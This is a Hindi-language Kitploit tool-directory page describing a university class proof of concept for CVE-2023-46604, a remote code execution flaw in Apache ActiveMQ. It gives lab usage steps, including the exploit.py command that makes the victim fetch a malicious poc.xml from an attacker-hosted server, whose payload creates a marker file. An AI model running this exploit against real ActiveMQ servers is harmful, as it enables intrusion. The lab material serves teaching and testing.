Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SSP-Assignment-3-RCEYouLater — CVE-2023-46604 के लिए एक PoC, जो UPB में उन्नत साइबर सुरक्षा मास्टर्स के SPS क्लास के भाग के रूप में लिखा गया है। | Kitploit
उपकरण/GitHubGitHub/rockydesigne/ssp-assignment-3-rceyoulater
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubrockydesigne/ssp-assignment-3-rceyoulater

SSP-Assignment-3-RCEYouLater

CVE-2023-46604 के लिए एक PoC, जो UPB में उन्नत साइबर सुरक्षा मास्टर्स के SPS क्लास के भाग के रूप में लिखा गया है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
228 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2023-46604: Apache ActiveMQ RCE प्रूफ-ऑफ-कॉन्सेप्ट

असाइनमेंट: SSP Assignment 3 टीम: RCE You Later सदस्य: Banica Horia Alexandru, Comarlau Vlad-Constantin

पीओसी करने के लिए रेपो का उपयोग करने का वीडियो लिंक: https://www.youtube.com/watch?v=vum4qTF4ygU

🚨 अवलोकन

इस रिपॉजिटरी में CVE-2023-46604 के लिए एक पूरी तरह से कार्यात्मक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शामिल है। यह कमजोरी एक हमलावर को एक दुर्भावनापूर्ण XML कॉन्फ़िगरेशन फ़ाइल को डिसीरियलाइज़ करने के लिए मजबूर करके कमजोर Apache ActiveMQ सर्वर (संस्करण 5.15.10) पर मनमानी शेल कमांड निष्पादित करने की अनुमति देती है।

लक्ष्य: यह साबित करने के लिए कि हमारा नियंत्रण है, पीड़ित सर्वर के अंदर pwned_by_ssp_team नाम की एक फ़ाइल बनाएं।


🛠️ आवश्यक शर्तें

Exploit चलाने से पहले, सुनिश्चित करें कि आपके पास:

  1. Docker और Docker Compose (इंस्टॉल और चालू)
  2. Python 3

📂 रिपॉजिटरी संरचना

  • vulnerable-env/: पीड़ित सर्वर के Docker सेटअप को शामिल करता है।
  • attacker/: एक्सप्लॉइट स्क्रिप्ट और दुर्भावनापूर्ण पेलोड शामिल करता है।
    • exploit.py: Python स्क्रिप्ट जो दुर्भावनापूर्ण पैकेट भेजती है।
    • serve.py: XML पेलोड को होस्ट करने के लिए एक सरल HTTP सर्वर।
    • poc.xml: दुर्भावनापूर्ण कॉन्फ़िगरेशन फ़ाइल जिसमें कमांड touch /tmp/pwned_by_ssp_team शामिल है।

  • 🚀 चरण-दर-चरण उपयोग गाइड

    चरण 1: पीड़ित (ActiveMQ) प्रारंभ करें

    हम Docker का उपयोग करके ActiveMQ का एक पुराना, कमजोर संस्करण चलाएंगे।

    1. एक टर्मिनल खोलें।
    2. vulnerable-env फ़ोल्डर पर जाएं:
      root@kitploit:~
      cd vulnerable-env
      
    3. कंटेनर प्रारंभ करें:
      root@kitploit:~
      docker-compose up -d
      
    4. सर्वर के पूरी तरह से शुरू होने के लिए 30 सेकंड प्रतीक्षा करें।

    चरण 2: दुर्भावनापूर्ण XML होस्ट करें

    पीड़ित सर्वर को हमसे निर्देश डाउनलोड करने की आवश्यकता है। हम इन निर्देशों को होस्ट करने के लिए एक छोटा वेब सर्वर स्थापित करेंगे।

    1. एक दूसरा टर्मिनल खोलें।
    2. attacker फ़ोल्डर पर जाएं:
      root@kitploit:~
      cd attacker
      
    3. Python वेब सर्वर प्रारंभ करें:
      root@kitploit:~
      python3 serve.py
      
      इस टर्मिनल को खुला रखें! आपको "Serving HTTP on 0.0.0.0 port 8000..." दिखना चाहिए

    चरण 3: Exploit लॉन्च करें

    अब हम विशिष्ट नेटवर्क पैकेट भेजते हैं जो कमजोरी को ट्रिगर करता है।

    1. एक तीसरा टर्मिनल खोलें।

    2. attacker फ़ोल्डर पर जाएं:

      root@kitploit:~
      cd attacker
      
    3. एक्सप्लॉइट स्क्रिप्ट चलाएं।

      • नोट: यदि आप macOS या Windows पर हैं, तो नीचे दिए गए कमांड का बिल्कुल वैसे ही उपयोग करें जैसे लिखा गया है।
      root@kitploit:~
      python3 exploit.py -i 127.0.0.1 -p 61616 -u http://host.docker.internal:8000/poc.xml
      
      • Linux उपयोगकर्ता: यदि आप Linux पर हैं, तो host.docker.internal को नेटवर्क ब्रिज के गेटवे, आमतौर पर: 172.17.0.1 से बदलें। यदि निर्धारित पता काम नहीं करता है तो इस तरह से पता प्राप्त करने का प्रयास करें: docker network inspect bridge -f '{{range .IPAM.Config}}{{.Gateway}}{{end}}'

    चरण 4: हैक सत्यापित करें

    क्या यह काम किया? आइए देखें कि क्या कंटेनर के अंदर फ़ाइल बनाई गई थी।

    1. अपने पहले टर्मिनल (या किसी भी टर्मिनल) पर वापस जाएं।
    2. पीड़ित के अंदर /tmp फ़ोल्डर की जांच करने के लिए यह कमांड चलाएं:
      root@kitploit:~
      docker exec activemq-victim ls -l /tmp
      
    3. सफलता: आपको pwned_by_ssp_team नाम की एक फ़ाइल दिखनी चाहिए।

    🧹 सफाई

    कमजोर कंटेनर को रोकने और हटाने के लिए:

    root@kitploit:~
    cd vulnerable-env
    docker-compose down
    
    टूल डाउनलोड करें